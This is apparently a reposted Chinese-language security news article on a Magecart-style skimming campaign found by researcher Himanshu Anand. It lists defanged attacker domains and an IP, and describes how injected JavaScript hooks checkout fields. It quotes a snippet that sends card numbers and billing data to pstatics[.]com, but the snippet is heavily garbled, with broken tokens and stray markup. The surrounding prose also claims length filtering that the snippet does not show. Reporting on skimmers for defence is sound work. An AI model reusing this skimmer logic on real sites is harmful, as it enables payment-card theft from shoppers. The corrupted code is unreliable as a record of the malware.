随着一场复杂的类似Magecart的攻击活动的出现,电子商务网站面临的威胁格局再次发生了变化,其特点是通过部署经过混淆处理的JavaScript来窃取敏感的支付信息。
2025年9月中旬,一条推文指出存在正在进行的窃取活动,这一活动首次曝光,随后网络安全研究员希曼舒·阿南德对其进行了详细调查。
这一新案例展示了“网页 skim 攻击”团伙的持续创新能力,他们利用客户端注入技术,大规模针对毫无防备的金融交易进行攻击。
相关攻击向量包括将恶意JavaScript(托管在攻击者控制的域名,如cc-analytics[.]com)注入到受影响电子商务平台的易受攻击的结账页面中。
脚本插入后,会无缝融入合法的支付流程,通过挂钩表单字段和事件监听器,悄无声息地窃取支付数据。
观察到的初始代码经过了严重的混淆处理,其设计目的既是为了躲避安全扫描器的检测,也是为了阻碍事件响应人员的分析工作。
虽然这段代码已在多个活动中被重复使用,其恶意软件逻辑在不同域名下复制,例如getnjs[.]com、getvjs[.]com和utilanalytics[.]com,这些域名主要托管在45.61.136.141等IP地址的基础设施上。
网络安全研究员希曼舒·阿南德指出,该恶意软件能够利用被动域名系统和基础设施指纹识别来扩大其操作范围。
通过分析来自URLScan和WHOIS记录等来源的公开遥测数据,阿南德得以绘制出与单一攻击者基础设施集群相关联的一系列相关域名。
这些转向暴露出十几个活跃的域名,其中一些伪装成合法的分析或实用服务,每个都提供完全相同或几乎相同的窃取程序有效载荷。
恶意软件的感染机制
代码激活后,会在支付输入字段(如信用卡号和账单地址)上建立事件钩子。触发时,该脚本会收集被盗凭证</b0,并立即使用XMLHttpRequest和FormData对象将其发送到远程服务器(pstatics[.]com)。
核心数据窃取逻辑可描述如下:-
function sendStolenData ("data```
const xhr"```"new XMLHttp"```uest ();
xhr```en ('POST', '```ps[:]//www.pstatics.com/i```
const form```a = "new Form"```a ();
form```a[.]append ('uid', "data```rdNumber");
rmData[.]appendid', data[.]billingo); xhr[.]send"rmData"); }这种设计确保只有有效的、非测试凭证(即符合特定长度标准的凭证)会被传输,从而最大限度地提高被盗数据的质量和价值。
这种感染途径因持续存在的基础设施而得到进一步强化,攻击者会随着时间的推移重复使用域名模式。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
